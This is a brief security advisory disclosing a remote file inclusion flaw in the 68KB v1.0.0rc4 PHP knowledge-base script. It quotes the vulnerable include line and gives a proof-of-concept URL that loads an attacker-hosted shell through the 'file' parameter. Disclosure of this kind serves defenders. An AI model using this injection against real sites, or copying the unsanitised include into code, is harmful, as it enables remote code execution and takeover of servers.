====================================================
68KB v1.0.0rc4 Remote File Include Vulnerability
====================================================
Vendor: http://68kb.com
download: http://github.com/68designs/68KB/downloads
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com
Original Advisories : http://eidelweiss-advisories.blogspot.com/2010/08/68kb-v100rc4-remote-file-include.html
=====================================================================
Description:
68KB is an open source PHP MySQL driven knowledge base script. Built with you in mind to make it easy to configure and setup.
Note:
This is the same vuln in other lower version (http://www.exploit-db.com/exploits/11904/)
Vendor Not Fix the vulnerability in all folder !!!
=====================================================================
-=[ vuln c0de ]=-
[!] path/themes/admin/default/modules/show.php
<?php include_once($file); ?>
=====================================================================
-=[ P0C ]=-
http://127.0.0.1/path/themes/admin/default/modules/show.php?file= [inj3ct0r shell]
=========================| -=[ E0F ]=- |=================================